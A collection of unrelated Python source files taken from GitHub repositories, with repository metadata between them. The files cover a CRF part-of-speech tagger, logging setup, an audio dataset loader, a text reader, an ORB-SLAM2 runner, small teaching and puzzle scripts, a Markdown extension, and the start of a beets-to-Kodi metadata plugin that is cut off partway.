    with the surface form in column 1, lemma in column 2, POS in column 4 and
    the target tag in column 7. A "</s>" marker is appended after every
    sentence (the trailing one is popped from the lexicon stream only).

    Returns:
        (lexicons, tags, pos, lemma) lists.
    """
    tags = []
    lexicons = []
    lemma = []
    pos = []
    sentences = input_.split("\n\n")
    for sentence in sentences:
        words = sentence.split("\n")
        for word in words:
            tokens = word.split("\t")
            tags.append(tokens[7])
            lexicons.append(tokens[1])
            pos.append(tokens[4])
            lemma.append(tokens[2])
        lexicons.append("</s>")
        tags.append("</s>")
        lemma.append("</s>")
        pos.append("</s>")
    lexicons.pop()
    return lexicons, tags, pos, lemma


def features(sentence, index, pos_sentence):
    """Build the CRF feature dict for the word at `index`.

    Args:
        sentence: list of surface forms [w1, w2, ...].
        index: position of the word within the sentence.
        pos_sentence: POS tags parallel to `sentence`.
    """
    return {
        'word': sentence[index],
        'is_first_word': int(index == 0),
        'is_last_word': int(index == len(sentence) - 1),
        'prev_word': '' if index == 0 else sentence[index - 1],
        'next_word': '' if index == len(sentence) - 1 else sentence[index + 1],
        'prev_pre_word': '' if index == 0 or index == 1 else sentence[index - 2],
        'next_next_word': '' if index == len(sentence) - 1 or index == len(sentence) - 2 else sentence[index + 2],
        'is_numeric': int(sentence[index].isdigit()),
        'is_alphanumeric': int(bool((re.match('^(?=.*[0-9]$)(?=.*[a-zA-Z])', sentence[index])))),
        'pos': pos_sentence[index]
    }


def prepareData(input):
    """Turn raw CoNLL text into (X, y) for sklearn-crfsuite.

    X is a list of sentences, each a list of per-token feature dicts;
    y is the parallel list of per-token tag sequences.
    """
    lexicons, tags, pos, lemma = parse(input)
    sentences = ' '.join(lexicons).split(' </s> ')
    sentences_pos = ' '.join(pos).split(' </s> ')
    sentences_tags = ' '.join(tags).split(' </s> ')
    X = []
    y = []
    for sentenceid, sentence in enumerate(sentences):
        words = sentence.split(' ')
        pos = sentences_pos[sentenceid].split(' ')
        X.append([features(words, index, pos) for index in range(len(words))])
    for sentence_tag in sentences_tags:
        # Bug fix: previously split the stale loop variable `sentence`, which
        # duplicated the last sentence's words as the tags for every sentence.
        words_tag = sentence_tag.split(' ')
        y.append(words_tag)
    return X, y


# POS, Chunck, Lemma, Case Marking
def train_CRF(X_train, y_train):
    """Train an L-BFGS CRF on (X_train, y_train), pickle it, and return it."""
    crf = CRF(
        algorithm='lbfgs',
        c1=0.01,
        c2=0.1,
        max_iterations=100,
        all_possible_transitions=True
    )
    crf.fit(X_train, y_train)
    with open("./annCorra_crf_pos_model", 'wb') as fh:
        pickle.dump(crf, fh)
    # Returning the model lets callers avoid re-loading the pickle.
    return crf


def test_dev_data(X_test, y_test):
    """Report flat F1 on test and training data plus a per-class report.

    Bug fix: previously relied on a global `crf` that was never defined;
    the pickled model written by train_CRF is now loaded explicitly.
    Uses the module-level X_train/y_train for the training-set score.
    """
    with open("./annCorra_crf_pos_model", 'rb') as fh:
        crf = pickle.load(fh)
    y_pred = crf.predict(X_test)
    print("F1 score on Test Data ")
    print(metrics.flat_f1_score(y_test, y_pred, average='weighted', labels=crf.classes_))
    print("F score on Training Data ")
    y_pred_train = crf.predict(X_train)
    metrics.flat_f1_score(y_train, y_pred_train, average='weighted', labels=crf.classes_)

    ### Look at class wise score
    print(metrics.flat_classification_report(
        y_test, y_pred, labels=crf.classes_, digits=3
    ))


if __name__ == '__main__':
    # Guarded entry point (bug fix): file I/O and training previously ran at
    # import time.
    with open('./final_train.txt', 'r', encoding="utf-8") as train_file:
        traininput = train_file.read()
    # dev_file = open('./final_dev.txt', 'r', encoding="utf-8")
    # devinput = dev_file.read()

    X_train, y_train = prepareData(traininput)
    train_CRF(X_train, y_train)

    # X_test, y_test = prepareData(devinput)
    # test_dev_data(X_test, y_test)
hellomasaya/linguistics-data
assgn4/annCorraCRFModel.py
annCorraCRFModel.py
py
3,577
python
en
code
0
github-code
36
28801077672
# -*- coding: utf-8 -*-
"""
Created on Thu Feb  1 09:03:59 2018

@author: a001985
"""
import logging
# Bug fix: logging.handlers is a submodule that must be imported explicitly;
# without this, RotatingFileHandler below always raised AttributeError and
# file logging silently never worked.
import logging.handlers
import pathlib


# ==========================================================================
def add_log(log_id=None, log_directory=None, log_level='DEBUG', on_screen=True, prefix='log_ekostat'):
    """
    Set up a logger named "<prefix>_<log_id>" with optional file and screen output.

    log_id: Id of the logger. Typically a UUID
    log_directory: Directory to put the log files in. If not given no files are created.
    log_level: Specify the log level.
    on_screen: Set to True if you want to print to screen as well. Default is True.
    prefix: Prefix to be added to the files.

    Returns True when the logger was created, False when a logger with this id
    already has handlers attached.
    --------------------------------------------------------------
    Usage:
        self._logger = logging.getLogger('......')
        self._logger.debug('Debug message.')
        self._logger.info('Info message.')
        self._logger.warning('Warning message.')
        self._logger.error('Error message.')
        try:
            ...
        except Exception as e:
            self._logger.error('Exception: ' + str(e))
    """
    # logging_format = '%(asctime)s\t%(filename)s\t%(funcName)s\t%(levelname)-10s : %(message)s'
    logging_format = '%(asctime)s\t%(filename)s\t%(lineno)d\t%(funcName)s\t%(levelname)s\t%(message)s'

    log_id_ext = '{}_{}'.format(prefix, log_id)
    log = logging.getLogger(log_id_ext)
    # Dont add an excisting logger
    if len(log.handlers):
        return False

    print('=' * 100)
    print(log_id)
    print(log_directory)
    print(prefix)
    print('-' * 100)

    # Set debug log_level
    level_mapping = {'DEBUG': logging.DEBUG,
                     'INFO': logging.INFO,
                     'WARNING': logging.WARNING,
                     'ERROR': logging.ERROR}
    # Bug fix: the fallback was the string 'ERROR' rather than logging.ERROR.
    log_level = level_mapping.get(log_level.upper(), logging.ERROR)
    log.setLevel(log_level)

    # Bug fix: log_path is referenced in the final debug message below, so it
    # must exist even when no log_directory was supplied.
    log_path = None

    if log_directory:
        dir_path = pathlib.Path(log_directory)
        log_path = pathlib.Path(dir_path, '{}_{}.log'.format(prefix, log_id))

        # Log directories.
        if not dir_path.exists():
            dir_path.mkdir(parents=True)

        # Define rotation log files for internal log files.
        try:
            log_handler = logging.handlers.RotatingFileHandler(str(log_path),
                                                               maxBytes=128 * 1024,
                                                               backupCount=10)
            log_handler.setFormatter(logging.Formatter(logging_format))
            log_handler.setLevel(log_level)
            log.addHandler(log_handler)
        except Exception as e:
            print('EKOSTAT logging: Failed to set up file logging: ' + str(e))

    if on_screen:
        try:
            log_handler_screen = logging.StreamHandler()
            log_handler_screen.setFormatter(logging.Formatter(logging_format))
            log_handler_screen.setLevel(log_level)
            log.addHandler(log_handler_screen)
        except Exception as e:
            print('EKOSTAT logging: Failed to set up screen logging: ' + str(e))

    log.debug('')
    log.debug('=' * 120)
    log.debug('### Log added for log_id "{}" at locaton: {}'.format(log_id, str(log_path)))
    log.debug('-' * 120)
    return True


# ==========================================================================
def get_log(log_id):
    """
    Return a logging object set to the given id.

    Scans the logging manager's registry for the first logger whose name
    contains log_id (so the prefixed name is matched too).
    """
    for item in logging.Logger.manager.loggerDict.keys():
        if log_id in item:
            log_id = item
            break
    return logging.getLogger(log_id)
ekostat/ekostat_calculator
core/logger.py
logger.py
py
3,803
python
en
code
1
github-code
36
72573548584
import torch
import torchaudio
import glob
from torch.utils.data import Dataset
from utils.signal_processing import get_rnd_audio, extract_label_bat
from pandas import read_csv
from os import path


class raw_audio_dataset(Dataset):
    """Map-style dataset serving random crops of raw wav files with labels."""

    def __init__(self, wav_dir, annotation_file, input_size,
                 transform=None, target_transform=None):
        """
        Initialises the audio dataset.

        wav_dir:          directory containing the wav files
        annotation_file:  CSV with (at least) a 'File name' column
        input_size:       length of the random crop handed to the model
        transform:        optional transform applied to the audio tensor
        target_transform: optional transform applied to the label
        """
        # Perf fix: the annotation CSV was parsed twice (once per attribute);
        # read it once and slice the column from the cached frame.
        self.label = read_csv(annotation_file)
        self.audio_files = self.label['File name']
        self.transform = transform
        self.target_transform = target_transform
        self.input_size = input_size
        self.wav_dir = wav_dir

    def __len__(self):
        """
        Returns the length of the dataset
        """
        return len(self.audio_files)

    def __getitem__(self, idx):
        audio_path = path.join(self.wav_dir, self.audio_files[idx])
        # get_rnd_audio returns a tensor crop plus its begin/end offsets,
        # which are needed to cut the matching label window.
        audio, b, e = get_rnd_audio(audio_path, self.input_size)
        label = extract_label_bat(self.label.iloc[idx], b, e)
        if self.transform:
            audio = self.transform(audio)  # which audio transforms are usually used?
        if self.target_transform:
            label = self.target_transform(label)
        return audio, label
ArthurZucker/PAMAI
datasets/raw_audio_dataset.py
raw_audio_dataset.py
py
1,409
python
en
code
5
github-code
36
36121229353
import os
from typing import Any, Iterator, Dict, Set

from forte.data.data_pack import DataPack
from forte.data.data_utils_io import dataset_path_iterator
from forte.data.base_reader import PackReader
from ft.onto.base_ontology import Document

__all__ = [
    "PlainTextReader",
]


class PlainTextReader(PackReader):
    r""":class:`PlainTextReader` turns every text file found under a
    directory into one :class:`DataPack` covered by a single ``Document``."""

    def _collect(self, text_directory) -> Iterator[Any]:
        r"""Walk ``text_directory`` and yield the path of every file whose
        extension matches ``self.configs.file_ext``.

        Args:
            text_directory: directory containing the files.

        Returns:
            Iterator over paths to the matching files.
        """
        yield from dataset_path_iterator(text_directory, self.configs.file_ext)

    def _cache_key_function(self, text_file: str) -> str:
        # The bare file name is unique enough to key the cache.
        return os.path.basename(text_file)

    # pylint: disable=unused-argument
    def text_replace_operation(self, text: str):
        # No replacements are performed for plain text input.
        return []

    def _parse_pack(self, file_path: str) -> Iterator[DataPack]:
        datapack = DataPack()

        with open(file_path, "r", encoding="utf8", errors="ignore") as fh:
            raw_text = fh.read()

        datapack.set_text(raw_text, replace_func=self.text_replace_operation)
        # One Document annotation spanning the whole pack.
        Document(datapack, 0, len(datapack.text))
        datapack.pack_name = file_path
        yield datapack

    @classmethod
    def default_configs(cls):
        return {"file_ext": ".txt"}

    def record(self, record_meta: Dict[str, Set[str]]):
        r"""Method to add output type record of `PlainTextReader` which is
        `ft.onto.base_ontology.Document` with an empty set
        to :attr:`forte.data.data_pack.Meta.record`.

        Args:
            record_meta: the field in the datapack for type record that need to
                fill in for consistency checking.
        """
        record_meta["ft.onto.base_ontology.Document"] = set()
asyml/forte
forte/data/readers/plaintext_reader.py
plaintext_reader.py
py
1,931
python
en
code
230
github-code
36
7045186193
#!/usr/bin/python3
import argparse
import orbslam2
import os
import cv2
from time import sleep


def build_parser():
    """Command line: ORB vocabulary, ORB-SLAM2 settings file, sequence dir."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--vocab', type=str, required=True)
    parser.add_argument('--config', type=str, required=True)
    parser.add_argument('--seq', type=str, required=True)
    return parser


def main(args):
    """Run ORB-SLAM2 in stereo mode over every image pair listed in the
    sequence's rgb_left.txt / rgb_right.txt and save the trajectory."""
    sequence = []
    with open(os.path.join(args.seq, 'rgb_left.txt'), 'r') as f_left, \
            open(os.path.join(args.seq, 'rgb_right.txt'), 'r') as f_right:
        for line_left, line_right in zip(f_left, f_right):
            line_left, line_right = line_left.strip(), line_right.strip()
            # BUGFIX: a comment line in either index file must skip the whole
            # pair; the original only tested the left file, so a comment in
            # the right file desynchronised the pairing (or crashed split()).
            if line_left.startswith('#') or line_right.startswith('#'):
                continue
            ts, img_left_path = line_left.split()
            _, img_right_path = line_right.split()
            sequence.append((float(ts),
                             os.path.join(args.seq, img_left_path),
                             os.path.join(args.seq, img_right_path)))

    slam = orbslam2.System(args.vocab, args.config, orbslam2.Sensor.STEREO)
    slam.set_use_viewer(True)
    slam.initialize()

    for ts, path_left, path_right in sequence:
        img_left = cv2.imread(path_left)
        img_right = cv2.imread(path_right)
        slam.process_image_stereo(img_left, img_right, ts)
        sleep(0.1)  # throttle so the viewer can keep up

    save_trajectory(slam.get_trajectory_points(), 'trajectory.txt')
    slam.shutdown()


def save_trajectory(trajectory, filename):
    """Write one '<time> <row-major 3x4 pose>' line per trajectory point."""
    with open(filename, 'w') as traj_file:
        traj_file.writelines('{time} {r00} {r01} {r02} {t0} {r10} {r11} {r12} {t1} {r20} {r21} {r22} {t2}\n'.format(
            time=repr(t),
            r00=repr(r00), r01=repr(r01), r02=repr(r02), t0=repr(t0),
            r10=repr(r10), r11=repr(r11), r12=repr(r12), t1=repr(t1),
            r20=repr(r20), r21=repr(r21), r22=repr(r22), t2=repr(t2)
        ) for t, r00, r01, r02, t0, r10, r11, r12, t1, r20, r21, r22, t2 in trajectory)


if __name__ == '__main__':
    parser = build_parser()
    args = parser.parse_args()
    main(args)
cds-mipt/iprofihack
baselines/orbslam2/scripts/run_orbslam2_stereo.py
run_orbslam2_stereo.py
py
2,114
python
en
code
3
github-code
36
541220899
# Class implementation (comments translated from Russian)
class People:
    # Initialise a person
    def __init__(self, name="", surname="", age=0, gender="male"):
        self.name = name
        self.surname = surname
        self.age = age
        self.gender = gender

    def print_info(self):
        # Print the person's details
        print("Class: People\nName={}\nSurname={}"
              "\nAge={}\nGender={}".format(self.name, self.surname,
                                           self.age, self.gender))


class Student(People):
    # Initialise a student
    def __init__(self, name="", surname="", age=0, gender="male", group="no-group"):
        super().__init__(name=name, surname=surname, age=age, gender=gender)
        self.group = group
        print("Init!")

    def print_info(self):
        print("Class: Student\nName={}\nSurname={}"
              "\nAge={}\nGender={}\nGroup={}".format(self.name, self.surname,
                                                     self.age, self.gender,
                                                     self.group))


# Exercise the objects' methods and attributes
new_student = Student(name="Petr", surname="Petrenko", age=19, gender="male", group="ITN-41")
old_student = Student(name="Karina", surname="Borisova", age=20, gender="female", group="ITN-42")

new_student.print_info()
old_student.print_info()
print(new_student.name)
print(new_student.group)


class Employee(People):
    def __init__(self, name="", surname="", age=0, gender="male", post="specialist"):
        super().__init__(name=name, surname=surname, age=age, gender=gender)
        self.post = post

    def print_info(self):
        print("Class: People\nName={}\nSurname={}"
              "\nAge={}\nGender={}\nPost={}".format(self.name, self.surname,
                                                    self.age, self.gender,
                                                    self.post))


# Interfaces
class InformalParserInterface:
    def load_data_source(self, path, file_name):
        # Load the data
        raise NotImplementedError

    def extract_text(self, full_file_name):
        # Output the data
        raise NotImplementedError


class Test:
    public_attribute = 42
    __private_attribute = [1, 2, 3]


print(Test.public_attribute)
# BUGFIX: `Test.__private_attribute` raised AttributeError at module level,
# because double-underscore class attributes are name-mangled; outside the
# class body the attribute must be accessed via its mangled name.
print(Test._Test__private_attribute)
FRFGreyFox/artificial_intelligence
Lectors/OOP.py
OOP.py
py
2,807
python
en
code
1
github-code
36
11316424779
import json
import re
from pprint import pprint

# Scan a previously crawled Facebook group feed (yc_feed.json) and print
# every message mentioning "hackathon".  The file is a list of feed pages
# ("hundredmessages"); each page carries its messages in a 'data' list.

with open('yc_feed.json') as data_file:
    data = json.load(data_file)

i = 0  # page index printed alongside each hit
c = 0  # running count of matching messages
for hundredmessages in data:
    # Cheap pre-filter: only walk pages whose serialised JSON mentions the
    # keyword at all.
    hm_plain_text = json.dumps(hundredmessages)
    match = re.search(r'hackathon', hm_plain_text)
    if match:
        for msg in hundredmessages['data']:
            msg_plain_text = json.dumps(msg)
            match = re.search(r'hackathon', msg_plain_text)
            if match:
                c = c + 1
                print('---')
                print(c)
                print(i)
                print(msg['updated_time'])
                print('###')
    # NOTE(review): the original file's indentation was lost; this increment
    # presumably runs once per page (outer loop) — confirm against upstream.
    i = i + 1
adamhipster/hackathon_website
python_fb_group_crawls/parse_fb_feed_data.py
parse_fb_feed_data.py
py
530
python
en
code
0
github-code
36
38895942898
from sys import argv, exit

from pygmail.types import Account, Label

if __name__ == "__main__":
    # BUGFIX: the original read argv[1] before checking it, so a missing
    # argument raised IndexError and the usage message was unreachable.
    if len(argv) < 2 or not argv[1]:
        print("Usage: remove_labels.py <input_file>")
        exit(1)
    label_file = argv[1]

    account = Account.from_environment(load_labels=True)

    # One label name per line in the input file.
    label_names = None
    with open(label_file) as fh:
        label_names = fh.readlines()
    if not label_names:
        print("Label file is empty!")
        exit(1)

    for label_name in label_names:
        label = account.get_label_by_name(label_name.strip())
        if not label:
            print(f"Couldn't locate label {label_name} to delete")
            continue
        print(f"Deleting label, name={label.name()}, ID={label.label_id()}")
        try:
            result = Label.delete(account, label.label_id())
            print(result)
        except Exception as e:
            # Best-effort: report the failure and continue with the next label.
            print(e)
sk3l/pygmail
examples/remove_labels.py
remove_labels.py
py
881
python
en
code
0
github-code
36
27769169402
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule


class XyjjSpider(CrawlSpider):
    # Crawl spider for article listings on xyshjj.cn.
    name = 'xyjj'
    # allowed_domains = ['www.ccc.com']
    start_urls = ['https://www.xyshjj.cn/list-1487-1489-0.html']

    # Original note (translated from Chinese): the pagination links are too
    # similar to other links, so these rules have no effect; abandoned.
    # NOTE(review): LinkExtractor's `allow` pattern is matched against the
    # extracted URLs, not raw HTML, so r'">\d+</a>' can never match — this
    # is presumably why the rule never fired.
    rules = (
        Rule(LinkExtractor(allow=r'">\d+</a>'), callback='parse_item', follow=True),
    )

    def parse_item(self, response):
        # Collect article links and their link texts from the listing page.
        item = {}
        #item['domain_id'] = response.xpath('//input[@id="sid"]/@value').get()
        #item['name'] = response.xpath('//div[@id="name"]').get()
        #item['description'] = response.xpath('//div[@id="description"]').get()
        ls = response.xpath('.//div[@class="article-list"]/div')
        print('---------')
        for i in ls:
            url = i.xpath('./div/a/@href').get()
            num = i.xpath('./div/a/text()').get()
            print(url,' - ',num)
        return item
kshsky/PycharmProjects
dataFile/scrapy/ace/xxjjCrawl/xxjjCrawl/spiders/xyjj.py
xyjj.py
py
992
python
en
code
0
github-code
36
28068050082
# Treasure Island (translated from Korean)
# https://www.acmicpc.net/problem/2589
from collections import deque
import copy  # retained: no longer used after the visited-matrix rewrite


def bfs(treasure_map, x, y, n, m):
    """Return the number of moves from (x, y) to the farthest reachable
    land ('L') cell of the n x m map, exploring breadth-first."""
    # Perf fix: mark visited cells in a local boolean matrix instead of
    # deep-copying the whole map for every starting cell.
    visited = [[False] * m for _ in range(n)]
    dx = [-1, 1, 0, 0]
    dy = [0, 0, -1, 1]

    count = 0  # distance of the most recently dequeued cell
    queue = deque([[x, y, count]])
    visited[x][y] = True  # mark the starting cell as seen

    while queue:
        x, y, cnt = queue.popleft()
        # BFS dequeues in non-decreasing distance, so after the loop `count`
        # holds the maximum distance reached.
        count = cnt
        for i in range(4):
            nx = x + dx[i]
            ny = y + dy[i]
            if nx < 0 or nx >= n or ny < 0 or ny >= m:
                continue
            if treasure_map[nx][ny] == 'L' and not visited[nx][ny]:
                visited[nx][ny] = True
                queue.append([nx, ny, cnt + 1])
    return count


def solution():
    """Read the map from stdin and print the longest shortest path between
    any two land cells (full search: BFS from every 'L' cell)."""
    n, m = map(int, input().split())
    treasure_map = []
    count_list = []
    for _ in range(n):
        temp = list(input())
        treasure_map.append(temp)

    # Exhaustive search from every land cell
    for i in range(n):
        for j in range(m):
            if treasure_map[i][j] == 'L':
                count_list.append(bfs(treasure_map, i, j, n, m))
    print(max(count_list))


# Guard added so the module can be imported without blocking on stdin.
if __name__ == "__main__":
    solution()
hwanginbeom/algorithm_study
1.algorithm_question/6.BFS/131.BFS_wooseok.py
131.BFS_wooseok.py
py
1,279
python
ko
code
3
github-code
36
74627444265
def solution(array):
    """Return the element missing from a permutation of [1..N+1] with one
    element removed (Codility PermMissingElem).

    Handles the empty array (missing element is 1) and runs in O(N) with
    O(1) extra space, without sorting.
    """
    # BUGFIX: the original dereferenced array[-1] before its empty-input
    # check (IndexError on []), and mis-handled small inputs (e.g. [1]
    # returned 0 instead of 2).  The sum identity covers every case:
    # sum(1..n) - sum(array) is exactly the missing value.
    n = len(array) + 1
    return n * (n + 1) // 2 - sum(array)
diegosadrinas/Code-Tests
Codility/PermMissingElem/PermMissingElem.py
PermMissingElem.py
py
407
python
en
code
1
github-code
36
14247830669
""" Author: Todd Zenger, Brandeis University The purpose of this program is to show some basics of functions. """ """ First, we can put something in, and get a value out NOTICE: you are responsible to figure out what data type you are passing into the function and what type you are spitting out """ def f(x): y = 3*x + 2 return y # To get this value, we define it like any other variable g = f(4) # g is now equal to 14 """ Passing in variables is fine as well. It doesn't matter if we used x as an argument for the funciton. """ x = 2 h = f(x) # h is now equal to 8 """ Now, we can have the function give out multiple values. """ def funcs(x): y = 3*x - 2 z = 3*(x**2) - 2*x # Each value we want to return, we seperate with a comma return y, z """ There are two ways to extract a value from a function: 1) Either we define a new variable for each return value We can then use each one as a variable like we normally do """ j, k = funcs(4) # j is 10 and k is 40 """ 2) We can define a single variable that will hold all return values. It will then become a tuple, which is like a list that we cannot modify. Then to get each value, we just index like we would for a list that has the size of the number of return values we have """ n = funcs(3) """ Here, n is (7,21) So, n[0] is 7 and n[1] is 21 """ """ Next, we can pass in multiple values for the function to process """ def mulfunc(x, y, message): print(message) #We are allowed to do other operations like normal return (x+3*y) # We don't have to create a variable just to return d = mulfunc(2, 4, "Hello!") # d is 14 """ Final thing (at least for now) about functions, all the arguments we pass in don't always have to be set everytime. 
We can make a default value and choose whenever we want to set them """ def fixedfunc(x, y, mu=25, chi=3): return x*y - mu**chi """ First, we keep all default values """ q = fixedfunc(2, 5) # q is -15615 """ We can change the default values as well """ e = fixedfunc(4, 6, mu=5, chi=2) # e is -1 """ Or some of the default values as well """ i = fixedfunc(1, 9, mu=2) # i is 1
ToddZenger/PHYS19a
tutorial/lesson01/functions.py
functions.py
py
2,132
python
en
code
1
github-code
36
34848625388
from __future__ import absolute_import
from __future__ import unicode_literals

__version__ = '0.5.0'

from markdown import Extension
from markdown.treeprocessors import Treeprocessor


class MDXReplaceImageSrcTreeprocessor(Treeprocessor):
    # Tree processor that rewrites the ``src`` attribute of every <img>
    # element in the rendered document, replacing one configured substring
    # with another.

    def __init__(self, md, config):
        super(MDXReplaceImageSrcTreeprocessor, self).__init__(md)
        # config carries the resolved 'find'/'replace' strings.
        self.config = config

    def run(self, root):
        # Walk the whole element tree and patch each image's src in place.
        imgs = root.iter("img")
        for image in imgs:
            image.set("src", self.find_replace(image.attrib["src"]))

    def find_replace(self, path):
        # Plain substring replacement; no regex involved.
        return path.replace(self.config["find"], self.config["replace"])


class MDXReplaceImageSrcExtension(Extension):
    # Markdown extension wrapper that registers the tree processor above.

    def __init__(self, *args, **kwargs):
        # Each config entry is [default value, description].
        self.config = {
            'find' : ["", "the string to find"],
            'replace': ["", "the string to replace"],
        }
        super(MDXReplaceImageSrcExtension, self).__init__(*args, **kwargs)

    def extendMarkdown(self, md, md_globals):
        # NOTE(review): treeprocessors.add() and the md_globals parameter are
        # the pre-Markdown-3.0 API; newer versions use
        # treeprocessors.register(item, name, priority) — confirm which
        # markdown version this package targets before upgrading.
        ReplaceImageSrc = MDXReplaceImageSrcTreeprocessor(md, self.getConfigs())
        md.treeprocessors.add(
            "ReplaceImageSrc",
            ReplaceImageSrc,
            "_end"
        )
        md.registerExtension(self)


def makeExtension(*args, **kwargs):
    # Entry point used by Markdown(extensions=[...]).
    return MDXReplaceImageSrcExtension(*args, **kwargs)
twardoch/markdown-steroids
mdx_steroids/replimgsrc.py
replimgsrc.py
py
1,313
python
en
code
3
github-code
36
40272343197
from __future__ import absolute_import, division, print_function

import base64
import json
import os
import time

import requests
import urllib.request
from urllib.request import Request, urlopen
from uuid import UUID

from beets import config
import beets.library
from beets.plugins import BeetsPlugin
from pathlib import Path
from lxml import etree as et
import simplejson

# NOTE(review): artist lookups use this hard-coded key while album lookups
# read config['audiodb']['key'] — presumably they should agree; confirm.
audio_db_key = '195010'

# XML tag names emitted (in order) for artist.nfo / album.nfo files.
artist_tags = ['name', 'musicBrainzArtistID', 'sortname', 'genre', 'style',
               'mood', 'born', 'formed', 'biography', 'died', 'disbanded']
album_tags = ['title', 'musicBrainzAlbumID', 'artist', 'genre', 'style',
              'mood', 'theme', 'compilation', 'review', 'type', 'releasedate',
              'label', 'rating', 'year']

# Fallback payloads used when theaudiodb.com returns nothing parseable.
emptyalbum = '''{"album":[{"idAlbum":"","idArtist":"","idLabel":"",
"strAlbum":"","strAlbumStripped":"","strArtist":"",
"intYearReleased":"","strStyle":"","strGenre":"","strLabel":"",
"strReleaseFormat":"","intSales":"","strAlbumThumb":"",
"strAlbumThumbBack":"","strAlbumCDart":"","strAlbumSpine":"",
"strDescriptionEN":"","strDescriptionDE":"",
"strDescriptionFR":"","strDescriptionCN":"",
"strDescriptionIT":"","strDescriptionJP":"",
"strDescriptionRU":"","strDescriptionES":"",
"strDescriptionPT":"","strDescriptionSE":"",
"strDescriptionNL":"","strDescriptionHU":"",
"strDescriptionNO":"","strDescriptionIL":"",
"strDescriptionPL":"",
"intLoved":"","intScore":"","intScoreVotes":"","strReview":" ",
"strMood":"","strTheme":"","strSpeed":"","strLocation":"",
"strMusicBrainzID":"","strMusicBrainzArtistID":"",
"strItunesID":"","strAmazonID":"","strLocked":""}]}'''
emptyartist = '''{"artists":[{"idArtist":"","strArtist":"",
"strArtistAlternate":"","strLabel":"","idLabel":"",
"intFormedYear":"","intBornYear":"","intDiedYear":"",
"strDisbanded":"","strStyle":"","strGenre":"","strMood":"",
"strWebsite":"","strFacebook":"","strTwitter":"",
"strBiographyEN":"","strBiographyDE":"","strBiographyFR":"",
"strBiographyCN":"","strBiographyIT":"","strBiographyJP":"",
"strBiographyRU":"","strBiographyES":"","strBiographyPT":"",
"strBiographySE":"","strBiographyNL":"","strBiographyHU":"",
"strBiographyNO":"","strBiographyIL":"","strBiographyPL":"",
"strGender":"","intMembers":"","strCountry":"",
"strCountryCode":"","strArtistThumb":"","strArtistLogo":"",
"strArtistFanart":"","strArtistFanart2":"",
"strArtistFanart3":"","strArtistBanner":"",
"strMusicBrainzID":"","strLastFMChart":"","strLocked":""}]}'''

audiodb_url = "http://www.theaudiodb.com/api/v1/json/"
libpath = os.path.expanduser(str(config['library']))
lib = beets.library.Library(libpath)
LINK_ALBUM = 'https://musicbrainz.org/release/{0}'
LINK_ARTIST = 'https://musicbrainz.org/artist/{0}'
LINK_TRACK = 'https://musicbrainz.org/recording/{0}'


def artist_info(albumid):
    """Collect artist information from beets lib and audiodb.com."""
    for album in lib.albums(albumid):
        data = (album.albumartist, album.albumartist_sort,
                album.mb_albumartistid, album.genre, album.path)
        url = audiodb_url + "{0}/artist-mb.php?i=".format(audio_db_key)
        try:
            response = urllib.request.urlopen(url + data[2])
            data2 = simplejson.load(response)["artists"][0]
        except (ValueError, TypeError):
            # catch simplejson.decoder.JSONDecodeError and load emptydata
            data2 = json.loads(emptyartist)["artists"][0]
        out_data = (
            "{0};{1};{2};{3};{4};{5};{6};{7};{8};{9};{10};{11};{12}".format(
                data[0], data[2], data[1], data[3],
                data2["strStyle"] or '', data2["strMood"] or '',
                data2["intBornYear"] or '', data2["intFormedYear"] or '',
                data2["strBiographyEN"] or '', data2["intDiedYear"] or '',
                data2["strDisbanded"] or '', data2["strArtistThumb"] or '',
                data2["strArtistFanart"] or ''))
        return list(out_data.split(';'))


def artist_albums(artistid):
    """Get artist's albums from beets library."""
    albumdata = []
    for album in lib.albums(artistid):
        row = album.album, album.original_year
        albumdata.append(list(tuple([row[1], row[0]])))  # create sortable list
    # sort list to start with first release/album
    albumlist = (sorted(albumdata))
    return albumlist


def album_info(albumid):
    """Collect album information from beets lib and audiodb.com."""
    for album in lib.albums(albumid):
        data = (album.albumartist, album.mb_albumartistid,
                album.mb_releasegroupid, album.album, album.genre,
                album.comp, album.label, album.albumtype, album.mb_albumid)
        date = album.original_year, album.original_month, album.original_day
        rel_date = ("%s-%s-%s" % (date[0],
                                  format(date[1], '02'),
                                  format(date[2], '02')))
        url = audiodb_url + "{0}/album-mb.php?i=".format(
            config['audiodb']['key'])
        if data[5] == 0:
            comp = 'False'
        else:
            comp = 'True'
        try:
            response = urllib.request.urlopen(url + data[2])
            data2 = simplejson.load(response)["album"][0]
        except (ValueError, TypeError):
            # catch simplejson.decoder.JSONDecodeError and load emptydata
            data2 = json.loads(emptyalbum)["album"][0]
        out_data = ("{0};{1};{2};{3};{4};{5};{6};{7};{8};{9};{10};{11};{12};"
                    "{13};{14}".format((data[3]), (data[8]), (data[0]),
                                       (data[4]), (data2["strStyle"]) or '',
                                       (data2["strMood"]) or '',
                                       (data2["strTheme"]) or '', (comp),
                                       (data2["strReview"]) or '', (data[7]),
                                       (rel_date), (data[6]),
                                       (data2["intScore"]) or '', (date[0]),
                                       (data2["strAlbumThumb"]) or ''))
        return list(out_data.split(';'))


def album_tracks(albumid):
    """Get album's tracks from beets libary."""
    trackdata = []
    for item in lib.items(albumid):
        row = item.track, item.mb_trackid, item.length, item.title
        duration = time.strftime("%M:%S", time.gmtime(row[2]))
        trackdata.append(list(tuple([row[0], duration, row[1], row[3]])))
    tracklist = (sorted(trackdata))  # sort list by track number
    return tracklist


def kodi_path():
    """From kodi itself get the music library path.

    Useful for shared libraries, in order to get nfs or samba paths.
    Returns '' on any failure.
    """
    try:
        auth = str.encode(
            '%s:%s' % (config['kodi']['user'], config['kodi']['pwd']))
        authorization = b'Basic ' + base64.b64encode(auth)
        headers = {
            'Content-Type': 'application/json',
            'Authorization': authorization}
        url = "http://{0}:{1}/jsonrpc".format(
            config['kodi']['host'], config['kodi']['port'])
        music_lib_name = "{0}".format(config['kodi']['library_name'])
        data = {"jsonrpc": "2.0", "method": "Files.GetSources",
                "params": {"media": music_lib_name}, "id": 1}
        json_data = json.dumps(data).encode('utf-8')
        request = Request(url, json_data, headers)
        result = simplejson.load(urlopen(request))
        _kodi_path = result['result']['sources'][0]['file']
        return _kodi_path
    except (requests.exceptions.RequestException, ValueError, TypeError):
        return ''


def album_path(albumid):
    """Get (local album path, kodi-visible album path) for the album."""
    out_data = []
    for album in lib.albums(albumid):
        album_path = album.path.decode("utf-8")  # shadows the function locally only
        root = str(config["directory"])
        length = int(len(root) + 1)
